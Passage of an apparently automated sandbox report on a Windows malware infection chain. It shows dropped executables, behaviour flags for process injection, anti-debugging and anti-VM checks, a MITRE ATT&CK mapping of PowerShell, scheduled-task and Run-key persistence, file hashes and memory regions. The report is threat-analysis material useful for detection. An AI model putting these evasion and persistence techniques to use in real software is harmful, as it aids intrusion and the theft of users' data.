C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2524⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 44641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1424 -ip 14241⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD597c1e158c509e27cd7a89a0898879410
SHA197b0900b363bf8ab3d42c0f4625960359c6c0fb0
SHA2569cfca11a3f68c526715dbbfcbaf2c5f5c9ea6ef1bd936cac5062dd80ccb9adca
SHA512efd647800a338bdb856186ca1b714730e62d2667691600b0b403ac99364e6682fbbfdebfa38dc149f3e401d5d823a65ee879d67d1248a15f2f84d4b22c0f6f11
-
C:\Users\Admin\AppData\Local\Corporation.zipFilesize
16.3MB
MD59cb5edb138b8df3492c0b14b56d617ac
SHA1b02dfae970d31251d2f94cf14328f757ceb45c98
SHA256de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8
SHA51250306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logFilesize
2KB
MD547b3bb3bf3bd31854ef77da134dc534f
SHA179f7ee98bfce765215cb9bc54d6c27a748af50f3
SHA25627bd7f1def6afae36983285feba3f689c7a006617a7d48cdac752bbd8ca39683
SHA512f0d52c49fe5de3abd83875dc52755fbdd7d70aa92d31abae733a8104742372cee2f2e59c5b71f6d667144e52c97c543b095a718ea63410e1709f55b73b4953d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD568de3df9998ac29e64228cf1c32c9649
SHA1be17a7ab177bef0f03c9d7bd2f25277d86e8fcee
SHA25696825c1e60e4a87dc5dbae78b97104e6968275fa1602c69053d0192cae143f43
SHA5121658b0bc504a8a5c57c496477cd800a893d751f03d632ef50aff9327cd33ad0e4e4f27bcb85b20bd22bef2ca65600b7d92e2a1f18fd3d08ad6391983de77beaf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD56f738fcca0370135adb459fac0d129b9
SHA15af8b563ee883e0b27c1c312dc42245135f7d116
SHA2561d37a186c9be361a782dd6e45fe98b1f74215a26990af945a2b8b9aa4587ec63
SHA5128749675cdd8f667ff7ca0a0f04d5d9cad9121fd02ed786e66bcd3c1278d8eb9ce5995d3e38669612bdc4dccae83a2d1b10312db32d5097ef843512244f6f769a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
179B
MD5acb27da5871accd423ae23c5527dfe56
SHA1d0bfb28a4bf124f04654a84a23134e2ac538b6b1
SHA2567ecce8c1dc7a58271d4d8ba7e62b229a9d0ff7151b4865177b0a6ee1befaf001
SHA512b789052a131b1843f1f8261ab4859e16b3cc852cb21c2392831d9e164c82a1b4a430d02ba0b2dff80473e959d5f578f6b2bfdf7d3bcf136cd311b192fa2ef43e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5f3d1508d400bc267370074107b33ce77
SHA18f4fb3849e5ca5ea729e59bb9302581f254b646f
SHA2569ef2ceb5d92b931969dc15e91ed37a4bbc63c4b579dac506ae7f34b31461de45
SHA512e230f2f98559044046108c865c54ac26a73220571d7b94e86d41e126de0ce5262dc0776d4003330b12d8718e962336c0ea93ca0ae3d31f1ce0afa21ac4d08290
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD53a7367f678feb319131545fa0d1cf38f
SHA1e20cc1c22c53b9133023f8d02f21692e44330e07
SHA25690f7e8f5bed5c262fa3b11054e78645e672527f785ae6a03c81e56c378b37d15
SHA5129415e0ac6e01a0f42954b493bf099b84ce56269d04d245c751db5f7ba789c5888d8c19acaca0646dc6a239b326656af4c29b065b7650d6a77272913ae8beab7b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD50e85af8dbb0cf5fffcf375db0037c041
SHA11080db45898434299cdeef7008f40c0820bc8b0f
SHA2560aa6fe05753375a5146053cc9c41e27958bb7dbb1a9ed2953561c60bf75af12f
SHA512a3e7562573ceab83025e0e586668ecd837f7ed8494dadbd2445a2d455ea4b0f7613efea0fd44de0bc50798542793af639aa64c583b05d98a79eaa3bf80dda0c8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5eda44076dc3e4270fec4fcf70b27c7ff
SHA144c9b863d5df65dc9717aa863ed39ebcb6110269
SHA25698adfaf9b0f36986dbfbde6cb28a77d39278606966991514ccf5a62d23f85d52
SHA5128f94d6b73f418bd8d026593672416f013e6e589347a6d9608f065b04c8de16daabedade712b509b2e571ac5e67e71ca6d18971b5ccbfbdf9cf079c36034fa31a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57355f4a1d4e1a2519a4a60ee11f1d192
SHA18802bbb71f3e8947c02a7d835b31c7abf4289780
SHA2562fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3
SHA5127186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exeFilesize
297KB
MD55d860e52bfa60fec84b6a46661b45246
SHA11259e9f868d0d80ac09aadb9387662347cd4bd68
SHA256b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30
SHA51204ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exeFilesize
226KB
MD5f61c7b1a264cec5ccdf9df00ab136b05
SHA13aa84e4727bec8bb3c26c6b0fbdc55c25ddfcdf8
SHA256b1ff1451c947311f7841f5958213d65a5b33423d7bc751202cb1fcd0bc61cfc1
SHA512e8e29bb4118e061f49d0d27c178e3d01edf880fdf18fd39f9341e499196e0929cc4845578742d7da5ba4fd42d72487fa81fe826e3b2b746910d4698b9929f10a
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exeFilesize
522KB
MD570a578f7f58456e475facd69469cf20a
SHA183e147e7ba01fa074b2f046b65978f838f7b1e8e
SHA2565c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a
SHA512707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exeFilesize
310KB
MD56e3d83935c7a0810f75dfa9badc3f199
SHA19f7d7c0ea662bcdca9b0cda928dc339f06ef0730
SHA256dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed
SHA5129f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exeFilesize
154KB
MD55f331887bec34f51cca7ea78815621f7
SHA12eb81490dd3a74aca55e45495fa162b31bcb79e7
SHA256d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8
SHA5127a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exeFilesize
659KB
MD5bbd06263062b2c536b5caacdd5f81b76
SHA1c38352c1c08fb0fa5e67a079998ef30ebc962089
SHA2561875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9
SHA5127faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exeFilesize
5.8MB
MD56c149b39619395a8ba117a4cae95ba6f
SHA13ef8be98589745ecce5522dd871e813f69a7b71b
SHA256c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8
SHA512866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4
-
C:\Users\Admin\AppData\Local\Temp\6.exeFilesize
4.8MB
MD55bb3677a298d7977d73c2d47b805b9c3
SHA191933eb9b40281e59dd7e73d8b7dac77c5e42798
SHA25685eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f
SHA512d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.8MB
MD574567fb6c1a91b1fc4af041fd8d95a11
SHA11a248b15186b94f07c5e85fa771da48b1afa0bba
SHA2569a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446
SHA51218028b2bfd4eda27a95507a1f407791bcb88d17f91ec9ea48a53f01141562ce4580b12345cb22ebb81a976b1ff63d8c379f65bf4b1cd0d7c0d332f159b3dec08
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.batFilesize
1KB
MD50be4cbfa51fe5f8010e78553a28f2779
SHA1ae21783c148ae1443fa87a43b9b51cb0ab1a799b
SHA256cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90
SHA512337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cf0kfmi.3tg.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
568B
MD5e861a08036b9eb5f216deb58e8a7934d
SHA15f12dd049df2f88d95f205a4adc307df78ac16ee
SHA256e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb
SHA5127ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9
-
\??\pipe\LOCAL\crashpad_2688_KHSUELCMRREWYWLCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/884-272-0x0000000072E5E000-0x0000000072E5F000-memory.dmpFilesize
4KB
-
memory/884-49-0x00000000050F0000-0x000000000513C000-memory.dmpFilesize
304KB
-
memory/884-154-0x00000000053B0000-0x0000000005416000-memory.dmpFilesize
408KB
-
memory/884-44-0x0000000004E60000-0x0000000004E6A000-memory.dmpFilesize
40KB
-
memory/884-45-0x0000000006040000-0x0000000006658000-memory.dmpFilesize
6.1MB
-
memory/884-47-0x0000000005050000-0x0000000005062000-memory.dmpFilesize
72KB
-
memory/884-43-0x0000000004DB0000-0x0000000004E42000-memory.dmpFilesize
584KB
-
memory/884-42-0x0000000005470000-0x0000000005A16000-memory.dmpFilesize
5.6MB
-
memory/884-41-0x00000000002C0000-0x0000000000310000-memory.dmpFilesize
320KB
-
memory/884-46-0x00000000051F0000-0x00000000052FA000-memory.dmpFilesize
1.0MB
-
memory/884-40-0x0000000072E5E000-0x0000000072E5F000-memory.dmpFilesize
4KB
-
memory/884-48-0x00000000050B0000-0x00000000050EC000-memory.dmpFilesize
240KB
-
memory/1312-239-0x0000000008CE0000-0x0000000008D56000-memory.dmpFilesize
472KB
-
memory/1312-171-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/1312-240-0x0000000008C90000-0x0000000008CAE000-memory.dmpFilesize
120KB
-
memory/1424-216-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/1556-260-0x0000000002E80000-0x0000000002E81000-memory.dmpFilesize
4KB
-
memory/1556-262-0x0000000000270000-0x0000000000A8E000-memory.dmpFilesize
8.1MB
-
memory/1920-4-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-3-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-0-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-17-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-2-0x0000000000841000-0x000000000086F000-memory.dmpFilesize
184KB
-
memory/1920-1-0x0000000077496000-0x0000000077498000-memory.dmpFilesize
8KB
-
memory/2068-65-0x00000000017F0000-0x00000000017F1000-memory.dmpFilesize
4KB
-
memory/2068-67-0x00000000017F0000-0x00000000017F1000-memory.dmpFilesize
4KB
-
memory/2080-19-0x0000000000221000-0x000000000024F000-memory.dmpFilesize
184KB
-
memory/2080-488-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-521-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-520-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-172-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-248-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-21-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-20-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-519-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-301-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-518-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-512-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-481-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-471-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-18-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-243-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-470-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-469-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-451-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-242-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2284-274-0x00000000009F0000-0x0000000000EA1000-memory.dmpFilesize
4.7MB
-
memory/2284-300-0x00000000009F0000-0x0000000000EA1000-memory.dmpFilesize
4.7MB
-
memory/2660-429-0x00007FF648910000-0x00007FF648F46000-memory.dmpFilesize
6.2MB
-
memory/2660-458-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2660-459-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2660-247-0x00007FF648910000-0x00007FF648F46000-memory.dmpFilesize
6.2MB
-
memory/3156-313-0x0000020F59740000-0x0000020F59752000-memory.dmpFilesize
72KB
-
memory/3156-314-0x0000020F59500000-0x0000020F5950A000-memory.dmpFilesize
40KB
-
memory/3592-428-0x0000000000520000-0x0000000000576000-memory.dmpFilesize
344KB
-
memory/3592-427-0x0000000000520000-0x0000000000576000-memory.dmpFilesize
344KB
-
memory/3892-515-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/3892-517-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/4224-219-0x000000000A850000-0x000000000AD7C000-memory.dmpFilesize
5.2MB
-
memory/4224-218-0x000000000A150000-0x000000000A312000-memory.dmpFilesize
1.8MB
-
memory/4224-217-0x0000000008FB0000-0x0000000009000000-memory.dmpFilesize
320KB
-
memory/4224-66-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/5028-148-0x00000201D5E40000-0x00000201D5E62000-memory.dmpFilesize
136KB